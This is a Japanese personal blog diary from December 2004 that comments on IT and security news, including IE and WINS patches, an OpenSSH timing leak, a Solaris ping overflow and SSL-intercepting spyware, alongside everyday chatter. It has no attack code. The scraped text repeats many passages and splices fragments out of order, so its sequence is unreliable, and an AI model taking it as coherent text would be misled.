2004/12/01(水)水曜日ー。(いつの間にか12月...)
[雑談] はてなアンテナにつながらない。。。[yama:~]$ telnet a.hatena.ne.jp 80Trying 221.186.146.28...telnet: connect to address 221.186.146.28: Connection refused[yama:~]$ポートすら開いてない。一瞬、会社が強権を発動して不良社員を押さえにかかったのか!?と勘ぐって、接続元を変えてつなぎなおしてみて、やっぱりダメだったから ほっ としてみたり。(違[IT] * マイクロソフト、ITシステムやITインフラの管理/運用ソフト『Microsoft Operations Manager 2005日本語版』を発売
”も行ってみたかったし、それにそれに・・・!(涙[IT] * マイクロソフト、SP2適用でIEが文字化けする問題の修正プログラムを公開
ダウンロードできるようです。[IT] * Security&Trustウォッチ(30)魔法の鍵と最後の鍵
パスワード管理ツールを使ってみませんか?という話。暗号化の強度にもよるんでしょうが、何だかいざという時に根こそぎ持って行かれそうな(漠然とした)イメージが抜けない。。。[雑談] * 今年最も辞書検索された用語は「ブログ」 (ITmedia)
```textile辞書出版社のMerriam-Websterは、オンライン辞書で今年最も検索された用語の* トップ10を発表
した。今年を象徴する用語として1位に立ったのは「Blog」。ちなみに同社の辞書では「筆者による回想、コメント、時にはハイパーリンクを提供するオンラインの個人的日記を含むサイト」と定義している。```日本でもすっかりブログは一般に広まった感がありますね。(^-^) (←気のせい?[雑談] * このビールグラス、欲しい。(B食倶楽部)
飲み会でこのグラスを渡したくなる上司とかいます? 私の近くには幸いにもいないかも。(^-^)[IT] * モスバーガーでRFIDを使った牛肉の履歴管理実験
みたいですな。(^-^;[雑談] * 集中するときの仕草 (百式)
```textileRock-On-Rock-On の人たちには負けた…このサイトでは河原で岩を積み上げるアートを紹介している。この岩の積み上げ方がありえない。微妙な一点のみで岩を天につないでいく様はアートそのものである。
```・・・賽の河原?(^-^; にしては、このおぢちゃん年を取りすぎてるかな。(笑)[セキュリティ] * 指紋認証でカードレスに利用できるATM、コロンビアに登場
存在する PHPファイル名の後ろに「?=PHP」で始まる特定のコードを指定してやると、“PHP Credits”や、関連する画像が表示されるようですね。元ネタ: * Fwd: PHP Easter Eggs (Web Application Security ML)
```textile報告者が提示した表示例:
```クレジットの表示内容の違いによって、バージョンの差異が分かる、という話もありますが、バナー情報からバージョンを消している(php.ini に「expose_php = off」を書いている)場合には、この表示も一緒に出なくなるそうなので、別に問題は無さそうです。(^-^;[セキュリティ] * Windows XP SP1は最短4分で侵入・改竄〜米AvantgardeのPC放置実験
にもレポートが出ていましたが、サイトごとに、GeckoエンジンかIEエンジンか、JavaやActiveXをそれぞれ有効とするかなどを記録させることができるんですね!(すばらしい。) これで、「社内の業務システムが IE じゃないとダメだから、見るサイトによってブラウザを替えてるんです」な人も幸せになれるかも?!! 正式版の公開が待たれますね!(^-^)[雑談] * ムスカっぽくしゃべる法則 (カフェオレ・ライター)
さぁ、君たちも試してみたまえ。(違[IT] * SSL暗号通信を解読するスパイウェアに大学が警鐘 (ITmedia)
[雑談] * 某所から、極秘に入手しました。見本銀行券
textile『Microsoft Operations Manager 2005日本語版』は、ITシステムの運用管理/監視を行なうためのソフトで、“Microsoft Operations Framework”(MOF)に対応した製品。運用ノウハウを基にして大きな障害になる前に問題を検出したり、イベントやアラートに対する処理を設定して復旧作業を自動化したりできるのが特徴。リアルタイムで運用管理/監視/分析が行なえる管理ツールも用意されている。どんな感じなのでしょうか? >誰となくところで、、、
textile『Microsoft Operations Manager 2005 Mobile Phone Console』は、管理/監視するイベントやアラート(警告)を携快電話機から閲覧できるようにするためのモジュール。け、携快電話機ですか?(笑) せめて“軽快”に・・・。(違[雑談] * 日本のインターネット技術の最新動向が分かる“Internet Week 2004”が開幕
textile神奈川県横浜市の“パシフィコ横浜”において30日、インターネットの基盤技術や最新動向を学ぶ技術者向けの非商用イベント“Internet Week 2004”が開幕した。主催は、(社)日本ネットワークインフォメーションセンター(JPNIC)。12月3日までの4日間に、広範囲な技術分野の中から選りすぐられた多くのプログラムが提供される。いいなー、行きたかったなぁ。。。“* セキュリティホール memo BoF 2004
”も行ってみたかったし、それにそれに・・・!(涙[IT] * マイクロソフト、SP2適用でIEが文字化けする問題の修正プログラムを公開
textileマイクロソフトは26日、Service Pack 2(SP2)を適用したWindows XPで、Internet Explorer(IE)でシフトJISエンコードを使用しているWebページを表示した場合に、文字の一部が正しく表示されない場合がある現象について、修正プログラムを公開した。該当者は、* こちらから
ダウンロードできるようです。[IT] * Security&Trustウォッチ(30)魔法の鍵と最後の鍵
パスワード管理ツールを使ってみませんか?という話。暗号化の強度にもよるんでしょうが、何だかいざという時に根こそぎ持って行かれそうな(漠然とした)イメージが抜けない。。。[雑談] * 今年最も辞書検索された用語は「ブログ」 (ITmedia)
```textile辞書出版社のMerriam-Websterは、オンライン辞書で今年最も検索された用語の* トップ10を発表
した。今年を象徴する用語として1位に立ったのは「Blog」。ちなみに同社の辞書では「筆者による回想、コメント、時にはハイパーリンクを提供するオンラインの個人的日記を含むサイト」と定義している。```日本でもすっかりブログは一般に広まった感がありますね。(^-^) (←気のせい?[雑談] * このビールグラス、欲しい。(B食倶楽部)
飲み会でこのグラスを渡したくなる上司とかいます? 私の近くには幸いにもいないかも。(^-^)[IT] * モスバーガーでRFIDを使った牛肉の履歴管理実験
textileモスフードサービスと大日本印刷は11月30日、無線ICタグ(RFID)を使った食品トレーサビリティの実験を行なうと発表した。ハンバーガーの主原料の1つである牛肉について物流工程をRFIDで管理し、その店舗で実際に使われている牛肉の生産地域を店頭に表示する。今日の朝のニュースで見てたんですが、牛肉の固体識別番号の表示って、結構、事業者にとっては面倒くさそうな感じでしたねー。このような仕組みで負担が軽減できるのであれば、良いことだと思いますね。(最初に必要なコストは高そうですけども。)(このような仕組みが導入できない個人事業者は大変そうだけども。)[雑談] * 回転ドア、6割が休止 安全指針適合は5% 国交省調べ
textile国交省によると、東京・六本木ヒルズで今年3月に男児が回転ドアに挟まれて死亡した事故の後、全国のオフィスビルや病院など296施設に設置された計468台のうち、285台は使用を引き続き休止している。50台は撤去されていた。使用中は全体の3割弱の133台あり、このうち国の指針に適合しているのは25台だけ。残りの108台は、国の指針に沿った対策が直ちにとれないため、警備員を配置するなど追加的な措置をとっている。うちの会社が入ってるオフィスビルでも未だに使用休止中です。全国合わせても500台しかなかったんですか。回転ドアって意外と人気ないんですね。(^-^;[セキュリティ] * これまでで最大の変化は「ウイルス作者の変質」——ミコ・ヒッポネン氏
textileかつての敵は、ティーンエージャーや子供、ホビイストなどだった。しかし、2003年初頭ごろから『プロフェッショナルなウイルス作者』の兆候が見え始めてきた。…こうして作られ、ばら撒かれたウイルスは、プロキシとしてスパム送信に使われたり、DDoS攻撃に利用されたりする。ヒッポネン氏は、DDoSを仕掛けるとしてオンラインギャンブルサイトが恐喝を受けた例を挙げ、「より犯罪化、組織化が進んでいる」と指摘した。ぅんぅん。そういう時代になってきましたね。。。ところで、、、
textile「PC上のウイルスは80年代に登場したが、もしそのときに正しく対処していたならば、今のように何十万種類ものウイルスが登場することはなかったかもしれない。同じ間違いを犯さないよう、携帯電話をターゲットにしたウイルスに対して、今からでもできる限りの注意を払うべきだ。さもなければ2020年には、PCウイルスと同じように何十万種もの携帯向けウイルスが発生しているかもしれない」例えば、どのような正しい対処をしていれば良かったんでしょうか?(思いつきません。。。)[雑談] * 千円札偽造容疑で中2逮捕 パソコンで作り自販機で使う
textileパソコンを使って千円札を偽造したとして警視庁は、東京都世田谷区に住む区立中学2年の少年(14)を通貨偽造の疑いで逮捕、偽札を譲り受けなどしたとして、同学年の13歳と14歳の8人を補導したと1日発表した。少年は「遊ぶ金が欲しかった。小学生のころから偽造に興味があった」と話しているという。11月以降、釣り銭目当てに偽札約100枚を作り、ジュースやたばこの自動販売機などで使っていたとみて調べている。人ではなく自販機を騙すための偽札ですか。* 『奪取』(著.真保裕一)
http://www.amazon.co.jp
みたいですな。(^-^;[雑談] * 集中するときの仕草 (百式)
```textileRock-On-Rock-On の人たちには負けた…このサイトでは河原で岩を積み上げるアートを紹介している。この岩の積み上げ方がありえない。微妙な一点のみで岩を天につないでいく様はアートそのものである。
```・・・賽の河原?(^-^; にしては、このおぢちゃん年を取りすぎてるかな。(笑)[セキュリティ] * 指紋認証でカードレスに利用できるATM、コロンビアに登場
textileセキュリティの向上を目的として、銀行のATMなどで、キャッシュカードの利用者を確認するために、生体認証(バイオメトリクス)を採用したシステムの導入が話題となっているようだが、新たにバンカフェ銀行に設置されたATMは、読み取りセンサで利用者の指紋認証を行い、ID番号を入力するだけで、現金を引き出せることが大きな特徴になっているという。うーん、“カード+指紋”だったら「安心になったね♪」って話だけども、“ID番号の入力+指紋”ってかなりキケンな気が。グミ指とかで引き出されたら保証してくれたり・・・しないよね。(汗『利用者の半数以上が指紋認証方式への移行手続きを完了した』とか書いてあるなぁ。。。(怖い、怖い。)[雑談] * PHP Easter Eggs ("週"記)
存在する PHPファイル名の後ろに「?=PHP」で始まる特定のコードを指定してやると、“PHP Credits”や、関連する画像が表示されるようですね。元ネタ: * Fwd: PHP Easter Eggs (Web Application Security ML)
```textile報告者が提示した表示例:
```クレジットの表示内容の違いによって、バージョンの差異が分かる、という話もありますが、バナー情報からバージョンを消している(php.ini に「expose_php = off」を書いている)場合には、この表示も一緒に出なくなるそうなので、別に問題は無さそうです。(^-^;[セキュリティ] * Windows XP SP1は最短4分で侵入・改竄〜米AvantgardeのPC放置実験
textile調査対象となったのは、Windows Small Business Server 2003、Windows XP SP1、Windows XP SP1に無償配布されているファイアウォール「ZoneAlarm 5.1」をインストールしたもの、Windows XP SP2、Mac OS X 10.3.5、Linspireの合計6種類の環境。…実験の結果、最も弱かったのはWindows XP SP1で、この環境はわずか4分のうちに侵入され、9回にわたって改竄された。また、Windows Small Business Server 2003は8時間以内に侵入・改竄された。そのほかの環境では侵入の試みは失敗したが、それぞれ理由は異なっている。パーソナルファイアウォールを入れておけば、(外からの直接の攻撃に対しては)だいぶ耐性が上がることが実証されたようです。もちろん、攻撃は外からであるとは限らない(内部ネットワークからの攻撃、ウィルスや受動的攻撃などなど)わけですけども。[IT] * IEエンジンを選択可能、FirefoxベースのNetscape最新プロトタイプ
textileレンダリングエンジンを切り換えるには、タブに表示される小さなアイコンをクリックして、「Display like Netscape」または「Display like Internet Explorer」を選択する。サイト単位の設定が可能で、例えばMicrosoftのサイトをIE表示に設定すると、通常Netscape表示を利用していたとしても、MicrosoftのサイトはIE表示で開かれる。
- 津田ふみかさんの日記
にもレポートが出ていましたが、サイトごとに、GeckoエンジンかIEエンジンか、JavaやActiveXをそれぞれ有効とするかなどを記録させることができるんですね!(すばらしい。) これで、「社内の業務システムが IE じゃないとダメだから、見るサイトによってブラウザを替えてるんです」な人も幸せになれるかも?!! 正式版の公開が待たれますね!(^-^)[雑談] * ムスカっぽくしゃべる法則 (カフェオレ・ライター)
さぁ、君たちも試してみたまえ。(違[IT] * SSL暗号通信を解読するスパイウェアに大学が警鐘 (ITmedia)
textileMarketscoreは、1月に登場した「Netsetter」と呼ばれるスパイウェアプログラムの最新のバージョンだと、Computer Associates International(CA)のeTrustセキュリティ管理担当副社長サム・カリー氏は指摘する。「基本的に、このソフトはユーザーのすべてのWebトラフィックを、強制的に独自のプロキシサーバ経由でリダイレクトする」…この認証機関はSSLで暗号化されたWeb通信を傍受して、トラフィックを解読し、それをMarketscoreサーバに渡してから再度暗号化して目的地へ送る。なるほど、スパイウェア+SSL暗号通信を「解読」とか言うから、Global Hook でもかまして暗号化前のデータを覗き見るのかと思ったら、sslmitm ライクな手段なのね。(これなら証明書見てれば気づきますね。)
textile収集したデータの中にクレジットカード番号が確認された場合は、番号の最初の6けただけが保持される。このデータは、オンラインショッピングでクレジットカードがどのように使われているかについての情報をカード会社に提供するために利用される。ほかの銀行口座や社会保障番号などのデータは利用されず、たいてい破棄されると同氏は説明した。いや、そんな訳の分からない自主規制されたって安心できませんって。(^-^;[雑談] りふぁら今日の Referer に “http://www.steadysearch.com/” なんてのがあって、「を?! 出会い系サイトか? 寝てる間に、もう一人の yamagata が登録したのか?」と思って辿ってみたのに・・・残念ながら違いました。(笑)最近、「水原詩生 血液型」とかでたどり着いてくれる方が数名いらっしゃいました。タレントさんなので、公開されていますねー。⇒* 例えばこことか
[雑談] * 某所から、極秘に入手しました。見本銀行券
textile見本銀行券♪100万円メモ帳が1円〜♪ははは。(^-^; ちょっと欲しいかも。(笑)
2004/12/02(木)木曜日ー。(IW2004 はどんな感じー?)
[雑談] * 残念!「メイド・コスプレ」は落選 (ITmedia)
[雑談] * 「アクセスが多すぎただけ」——「スパム攻撃スクリーンセーバ」のサイトクラックはデマ (ITmedia)
非商用利用だったらフリーで使えたりするようです。(^-^)[IT] * ターボリナックスも年末商戦に参加?!
」を見る限り、“ユーザ⇒メールサーバ⇒署名ゲートウェイ⇒インターネット”という配置になっているようなんですが、「誰の」署名をつけるか、というのはどうやって判断してるんでしょうかね?これ。(最初は SMTP-AUTH とかでまず認証をして・・・と考えたのですが、この配置だと無理そうな感じ?)予想1.実は差出人に応じた署名ではなく、みんなに同じ署名をつけている。予想2.From: のアドレスで見分けて署名をしている。⇒だとしたら社内からは詐称し放題ですな。詐称メールに電子署名なんてつけられたら後で余計まずい事態になるような?予想3.私の知らない新技術を使用している。気になります。誰か教えてください。(^-^;[セキュリティ] * Microsoft、WINS の脆弱性を月例セキュリティ更新で修正予定
適当に和訳:
適当に和訳:
[雑談] * もう「酔った勢いで電話しないで」とは言わせない--豪携帯キャリアより新サービス
textile選ばれた流行語は以下の通り。-流行語受賞者トップテン・大賞チョー気持ちいいアテネオリンピック水泳代表選手・北島康介さんトップテン気合だー!アニマル浜口さんトップテンサプライズ自由民主党幹事長・武部勤さんトップテン自己責任該当者なしトップテン新規参入ライブドア社長・堀江貴文さんトップテンセカチュー作家・片山恭一さんトップテン中二階参議院議員・山本一太さんトップテンって言うじゃない…○○斬り!…残念!!波田陽区さんトップテン負け犬酒井順子さんトップテン冬ソナチュサン役・萩原聖人さん、ユジン役・田中美里さん“冬ソナ”は、韓国の方ではなく吹き替えの人が受賞したのね。(^-^; サプライズ/負け犬よりもメイド喫茶の方が身近に感じられる私ってば・・・だめだめ?(笑) いや、行ったことないんですけどね。>メイド喫茶[セキュリティ] * MS04-040: Internet Explorer 用の累積的なセキュリティ更新プログラム (889293)
textileこのセキュリティ情報の対象となるユーザー : Microsoft Windows を使用しているお客様脆弱性の影響 : リモートでコードが実行される最大深刻度 : 緊急影響を受けるソフトウェア :Microsoft Windows NT Server 4.0 Service Pack 6a Microsoft Windows NT Server 4.0 Terminal Server Edition, Service Pack 6Microsoft Windows 2000 Service Pack 3, Service Pack 4 Microsoft Windows XP Service Pack 1Microsoft Windows XP 64-Bit Edition Service Pack 1 Microsoft Windows 98、Microsoft Windows 98 Second Edition (SE) および Microsoft Windows Millennium Edition (Me) 脆弱性の詳細:Internet Explorer に脆弱性が存在し、それにより、影響を受けるコンピュータで、リモートからコードを実行される可能性があります。攻撃者はこの脆弱性を悪用し、悪質な Web ページを作成し、ユーザーがそのようなページを含む Web サイトを訪問した場合、リモートでコードが実行される可能性があります。攻撃者はこの脆弱性を悪用し、影響を受けるコンピュータを完全に制御する可能性があります。IFrame の BOf の問題を修正する緊急累積パッチがリリースされました。当てましょう♪関連: * MS、IFrame脆弱性を修正する緊急パッチをリリース (ITmedia)
[雑談] * 「アクセスが多すぎただけ」——「スパム攻撃スクリーンセーバ」のサイトクラックはデマ (ITmedia)
textileスパマーに攻撃を加えるべくLycos Europeが開発したスクリーンセーバが、大きな注目を集めている。…同社は12月1日に正式に「Make Love, Not Spam」スクリーンセーバを立ち上げたが、β版は既に広く配布されていた。…今週初めから、この「Make Love, Not Spam」ダウンロードがハックされているという報告が出回り始めた。…Lycos Europeの広報担当者が1日に語ったところによれば、同社のサイトは「決してハッキングされてはいない」という。同社はデマの標的となっただけで、誰かがハッキングされたサイトのスクリーンショットを捏造し、Eメールで転送したのだと担当者は説明する。真偽の程は分かりませんね...このスクリーンセーバ自体の是非については、Sophos の方の「スパマーと同レベルまで自分らをおとしめている」というコメントに同意。まったく。何をやってるんだか。>Lycos[雑談] 色んな手書きちっくなフォントたち@openmyaML使い方色々!(DOS窓、TeraTerm、年賀状、...?!)
- みかちゃんフォント
- さなフォン
- ことり文字ふぉんと
- 青柳衡山フォント2
非商用利用だったらフリーで使えたりするようです。(^-^)[IT] * ターボリナックスも年末商戦に参加?!
textileターボリナックス株式会社は2004年12月1日、一般ユーザー向けオールインワン Linux「ターボリナックスホーム」搭載ノート PC「TurboPC」を、年末までの期間限定で100台販売する、と発表した。…価格は13万8,000円、サポートサービス付きは14万8,000円。A4ノート、Celeron 2.53GHz。マシンはどこ製なんでしょうかね。そのメーカー、Windows搭載マシンを出せなくなったりしません?(←たぶん気のせい。[雑談] * 通勤ラッシュによるストレスは戦場以上--調査報告
textileBBCが11月30日に報じたところによると、この調査では、臨戦態勢の戦闘機のパイロットや機動隊の隊員よりも、会社に通勤する人の方が強いストレスを感じるとの結果が出たという。通勤ラッシュより、戦場の方が気が楽!・・・なわけではなくて、自分で対応/対策が取れるか取れないかで精神的負担が違うんだそうです。[IT] * メールに電子署名を自動的に追加、フィッシング詐欺対策でHDEがリリース
textileHDE Signed Mail Gatewayはこの部分を自動化することで、容易に電子署名付きのメールを送信できるようにする製品だ。SMTPリレーサーバ形式を採用しているため、既存のメールサーバを生かしながら電子署名を付与できる。また、携帯電話やWebメール宛のメールについては電子書名を加えないといった具合に、柔軟な運用が可能だ。“(独自SMTPエンジンは持たない)大量メール送信型のワーム”に感染したPCからのメールも、電子署名が付与されて届く世の中になるのでしょうか?(笑)ところで、「* 製品紹介ページ(HDE Signed Mail GW)
」を見る限り、“ユーザ⇒メールサーバ⇒署名ゲートウェイ⇒インターネット”という配置になっているようなんですが、「誰の」署名をつけるか、というのはどうやって判断してるんでしょうかね?これ。(最初は SMTP-AUTH とかでまず認証をして・・・と考えたのですが、この配置だと無理そうな感じ?)予想1.実は差出人に応じた署名ではなく、みんなに同じ署名をつけている。予想2.From: のアドレスで見分けて署名をしている。⇒だとしたら社内からは詐称し放題ですな。詐称メールに電子署名なんてつけられたら後で余計まずい事態になるような?予想3.私の知らない新技術を使用している。気になります。誰か教えてください。(^-^;[セキュリティ] * Microsoft、WINS の脆弱性を月例セキュリティ更新で修正予定
textileMicrosoft は、毎月第2火曜日に公開する月例セキュリティ更新の一部として、同修正パッチを準備する一方、顧客に対し、ポートをブロックするなどの自衛策をとるよう促した。問題の脆弱性は、「Windows Internet Name Service」(WINS) コンポーネントに存在する。「次の」月例セキュリティ更新の日にパッチを提供予定とのことでしょうかね?[セキュリティ] * [USN-34-1] OpenSSH information leakage (Bugtraq)
適当に和訳:
textile@Mediaservice.net は、OpenSSHサーバにインフォメーションリークの問題を2つ発見しました。1つ目パスワード認証が有効になっている場合に、ログイン試行の失敗後に「password:」プロンプトが再び現れるまでのタイミングの違いによって、システムにそのユーザが存在するか否かを確認することが可能です。2つ目SSH を通じての root でのログインを許可していない設定("PermitRootLogin no")の場合でも、応答のタイミングの違いによって、送信した root パスワードが正しかったのか間違っていたのかを判断することができます。これによって、弱い root パスワードを用いていないかをブルートフォース攻撃で知ることができます。アドバイザリからは影響するバージョンが不明。3.8.1p1 に当てるパッチが提供されてるようですが、3.9 には問題ないのかな? Openssh の Changelog には何も書いてないし、アドバイザリ発表の時期的に見ても、すべてのバージョンに影響するのかも。[雑談] * 月給制と年俸制、どちらも悩みは同じ?——エンジニアの給与意識 (ITmedia)
textile月給制に不満の人では「成果が反映されないから」が多く、年俸制に不満の人では「残業代がつかないから」という理由が多かった。さらに、両方に共通して見られる不満理由は「制度そのものより総額自体が低いから」「長時間労働だから」などが挙げられた。どっちにしても、結局、不満は変わらない、と。(^-^;ただ、年俸制を取っている会社のエンジニアは、(月給制のエンジニアに比べて)「年齢・学歴・勤続年数」はあまり給与決定に関係ない、と感じてる率が明らかに高いというのはちょっと興味深かったかも。[セキュリティ] * Sun Solaris ping Utility Privilege Escalation Vulnerability (Secunia)
適当に和訳:
textileSun Solaris には、ローカルユーザが権限昇格を試みることができる脆弱性が存在します。これは、pingコマンドが適切な境界チェックをしていないために、攻略可能なバッファオーバーフローを引き起こすことができることが原因です。この脆弱性を利用することで、攻撃者はシステム権限で任意のコードを実行することが可能です。x86、SPARC 共に Solaris 7, 8, 9 で影響があるようです。脆弱性の詳細は公表されていません。パッチを当てましょう。(パッチを当てられない場合は、/usr/sbin/ping の set-user-IDビットを除去したり、スタック上でのプログラムの実行を抑制する設定にしたりすれば影響を無くすことができます。詳しくは、Sun のアドバイザリを参照。)関連: * #57675: Security Vulnerability in ping (Sun Microsystems)
[雑談] * もう「酔った勢いで電話しないで」とは言わせない--豪携帯キャリアより新サービス
textile朝、ひどい二日酔いで目を覚ますと、酔った勢いで夜中の3時に昔のパートナーに電話したことを急に思い出し、ますます気分が悪くなった経験はないだろうか?ありますか?(笑) >誰となく
textileVirgin Mobileによると、同社は12月1日(現地時間)より、酔っ払った状態で電話をかけたくない相手の電話番号登録を受付開始する。相手先電話番号の前に「333」をつけてダイヤルするだけで登録手続きは完了だ。電話番号を登録すると、同社はその番号への通話を翌朝6時までストップしてくれる。昼間から飲んでしまう方には効果が無いようです。(^-^;微妙なサービスだなぁ。日本でも欲しいですか?こんなサービス。[雑談] * ACCS、DDoS攻撃で3月以降約80日間にわたりウェブサイトを停止
textileコンピュータソフトウェア著作権協会(ACCS)は「インターネット ウィーク2004」において、2004年3月以降、毎月一定期間にACCSのウェブサイトへのDDoS(分散サービス妨害攻撃)によるアクセス集中があり、その対策として毎月一定期間ウェブページの運用を停止して対応していることなどを報告した。…今回ACCSが被害を受けたのは「Antinny」ウイルスに感染したコンピュータの送信する信号によるものだ。…ACCSは2004年3月から11月にかけて合計約80日間ウェブサーバを停止する対策をとった。まぁ、DDoS って防ぎにくいですものね。(でも、1秒間に50コネクションも大量接続するような分かりやすいものだったら、自動で防御できそうですけども。) いずれにしても根本的に解決するためには、ISPなどの協力を仰ぎつつ、ウィルスに感染してるユーザに地道に警告して行く必要があるのでしょうね。
2004/12/03(金)金曜日ー。(水曜日の夜? フライデー・ナイト・ファンタジー?)
[IT] * 木下真吾の「RFIDプライバシ論」——世界で一つのIDがもたらす危険性
「2010年のクリーニング店」を舞台に物語りチックに解説がされています。確かに、RFID は、在庫の管理や入出庫の管理などに使う分には良いと思いますが、普段持ち歩くものや着て歩くものに(お店を出た後も)ついたままなのは嫌ですよねー。そのうち家に帰ったら無効化するのが一般化するのかも知れませんけども。[セキュリティ] * 現実味を帯びてきたサイバーテロとの戦い (ITmedia)
こーゆー大きな地下の建造物って何だか憧れますよね?!(ぇ場所は、埼玉県ですかー。第三新東京市(箱根?)の地下じゃないのね、残念!(違[雑談] * 「仕事でパソコン、家でもパソコン」--IT技術者が悲鳴
タイトルだけ見て、「え、むしろ近くにマシンがないと不安になりますが!」とか思ったんですが、内容を読んだら、なるほど。確かに家庭内サポセンと化してる人も多そう。(合掌)[雑談] * 日本最大級のスイーツフードテーマパーク 神戸スイーツハーバー
[雑談] * お仕事中に遊べるExcelワークシート麻雀ゲーム
のところで紹介されていました。「五時までモード」だと、「一萬」→「庶務一」とかに表示を変えたりもできるそうです。(笑) ちなみに、私はマージャンはやりません。(^-^;[雑談] 混信系出会い系ダイアル117(時報)へー! 今、テレビで見て初めて知りました!!(←見た目と違って実際は若いのです。)今から20年くらい前の話ですが、117の時報ダイアルに電話して、テープの音声に向かって**話しかける**と、その同じ時刻に同じ局内に所属する人が時報を聞いてた場合には会話ができたそうですねー。電電公社でも、まさかテープに向かって話す人はいないだろうと思って、会話機能を削除してなかったんだとか。で、当時は「出会い系」モドキとして利用されていたらしい。(天気予報でも同じことができたそうですが、予報の声が邪魔で会話しにくかったとのこと。)今の私に必要な機能なのに!! ・・・当然、現在はそんなことできないらしい。(^-^;参考:
[雑談] * 理系のための恋愛論 「男として、正しく恋愛相談にのる極意」 (第158回)
私、一度も相談されたことありませんわ...orz (ま、そりゃそうか。(^-^;)むしろ誰かを捕まえてこちらから相談を持ち掛けたい気分ですな。(笑)
「2010年のクリーニング店」を舞台に物語りチックに解説がされています。確かに、RFID は、在庫の管理や入出庫の管理などに使う分には良いと思いますが、普段持ち歩くものや着て歩くものに(お店を出た後も)ついたままなのは嫌ですよねー。そのうち家に帰ったら無効化するのが一般化するのかも知れませんけども。[セキュリティ] * 現実味を帯びてきたサイバーテロとの戦い (ITmedia)
textileまたテロリストグループには、外部からの攻撃が開始できない場合、内部から入るという手段もあるとPA Consulting Groupのロウ氏は指摘する。例えば、送電網制御ネットワークの弱点を知り、会社に不満を持っている電力会社社員を見つければいいのだ。制御系のネットワークなんて IP に乗ってるかすら定かじゃないし、インターネット側から内側への経路なんて絶たれてるんでしょうから、うん、内部に詳しい人間の協力は必要でしょうねー。でも、何日間もマヒさせようと思ったら、物理的に攻撃した方がてっとり早い気がしてしまうのは、IT系技術者失格でしょうか?(^-^;[雑談] * Lycos Europeのスクリーンセーバ攻撃で一部サイトがダウン (ITmedia)
textileLycos Europeでは、コンピュータの空き時間を利用してブラックリストに載ったスパムサイトにDDoS攻撃を仕掛けるスクリーンセーバを配布している。Netcraftではこの攻撃のターゲットとされた中国のサイト3カ所のうち、「bokwおいおい。Lycos、サイトをダウンさせることは無い、と断言してなかったかい?(汗 まぁ、レスポンスが低下したのでサイト運営者側が諦めて自分で停止しただけかも知れませんが。これから訴訟沙汰にならなけりゃ良いですけどね。[雑談] * 地底文化フォーラムが開催、地底のパルテノン神殿でドラえもんが語られる…hdok.com」と「printme diaprofits.biz」の2サイトがスクリーンセーバからの攻撃を受けてダウンしたと伝えた。
こーゆー大きな地下の建造物って何だか憧れますよね?!(ぇ場所は、埼玉県ですかー。第三新東京市(箱根?)の地下じゃないのね、残念!(違[雑談] * 「仕事でパソコン、家でもパソコン」--IT技術者が悲鳴
タイトルだけ見て、「え、むしろ近くにマシンがないと不安になりますが!」とか思ったんですが、内容を読んだら、なるほど。確かに家庭内サポセンと化してる人も多そう。(合掌)[雑談] * 日本最大級のスイーツフードテーマパーク 神戸スイーツハーバー
textileスイーツ職人がその場で作り上げる選りすぐりのスイーツ専門店15店舗と、スイーツレストラン3店舗、スイーツ関連の物販店1店舗を集結。また、全国各地のチーズケーキやソフトクリームを一堂に集めた期間限定の専門店や、「自由が丘スイーツフォレスト」のパティシエ店舗など、イベントショップ3店舗を用意し、常に新しい発見に満ちたスイーツ情報を発信します。本日オープンだそうです。冬の神戸観光は、神戸スイーツハーバー⇒神戸ルミナリエ?!関連: * 神戸に菓子テーマパーク 全国から22店、国内最大級
[雑談] * お仕事中に遊べるExcelワークシート麻雀ゲーム
textileゲームモードは次の2種類から選べます。「五時までモード」お仕事中に適したモードです。牌表示その他全てから麻雀特有の単語・用語を排除しています。「五時からモード」お仕事後にはこちらのモードでどうぞ。普通のマージャンゲームとして楽しめます。
- RIPさん
のところで紹介されていました。「五時までモード」だと、「一萬」→「庶務一」とかに表示を変えたりもできるそうです。(笑) ちなみに、私はマージャンはやりません。(^-^;[雑談] 混信系出会い系ダイアル117(時報)へー! 今、テレビで見て初めて知りました!!(←見た目と違って実際は若いのです。)今から20年くらい前の話ですが、117の時報ダイアルに電話して、テープの音声に向かって**話しかける**と、その同じ時刻に同じ局内に所属する人が時報を聞いてた場合には会話ができたそうですねー。電電公社でも、まさかテープに向かって話す人はいないだろうと思って、会話機能を削除してなかったんだとか。で、当時は「出会い系」モドキとして利用されていたらしい。(天気予報でも同じことができたそうですが、予報の声が邪魔で会話しにくかったとのこと。)今の私に必要な機能なのに!! ・・・当然、現在はそんなことできないらしい。(^-^;参考:
- 第30話 :「ダイヤル<117>を廻せ」
- NTT時報の混線を利用した会話
[雑談] * 理系のための恋愛論 「男として、正しく恋愛相談にのる極意」 (第158回)
私、一度も相談されたことありませんわ...orz (ま、そりゃそうか。(^-^;)むしろ誰かを捕まえてこちらから相談を持ち掛けたい気分ですな。(笑)
2004/12/04(土)土曜日ー。(相変わらず、ひきこもり♪)
[IT] * 路線検索サイト、特にPC向けが好評 (ITmedia)
」+「* Mapion
」を便利に使わせて貰っています。(ってゆーか、これがないと客先にたどり着けない。(笑)) あとは、「* goo路線 終電検索
」も便利かな?[雑談] * 米陸軍、マシンガンを装備したロボット「Talon」を2005年導入へ
**[Video]**Nintendo DS を使った合奏。バンドブラザーズの開発者の方々...なのでしょうか?[IT] * IBM、パソコン事業売却へ 中国大手と交渉と米紙報道
ですか。まだ何かやらかすつもりなんでしょうか?(^-^;[雑談] * 米刑務所、囚人による暴力的ゲームの使用を禁止に (ITmedia)
を。刑務所の中にレクリエーションセンターなんてあるのね。しかも、PlayStation 2 のゲームが 80本も置いてあるだなんて・・・。
“オタク”な人にプレゼントを贈る人は、ぜひ参考に・・・ならないな、これ。(^-^; (こーゆー系の人は欲しい物にコダワリがありそうだから、ぜひ本人に何が欲しいか聞いてあげてくださいな。サプライズ!させたい人は仕方が無いですけどー。)
textileこれによると、電車などの乗り換えや時刻の情報収集について、「PC向けの路線検索サイトを利用する」とした人が64.0%、「PCと携帯電話向けの路線検索サイトを両方利用する」が18.3%、「携帯電話の路線検索サイトを利用する」が4.7%となり、昨年調査時よりも路線検索でPCを利用する人が増えていることがわかったという。これは聞き方が悪いような。普段から携帯の検索サイトをメインにする人はいませんものね。出先とかでは便利に使うとしても。私は、「* Yahoo!路線情報
」+「* Mapion
」を便利に使わせて貰っています。(ってゆーか、これがないと客先にたどり着けない。(笑)) あとは、「* goo路線 終電検索
」も便利かな?[雑談] * 米陸軍、マシンガンを装備したロボット「Talon」を2005年導入へ
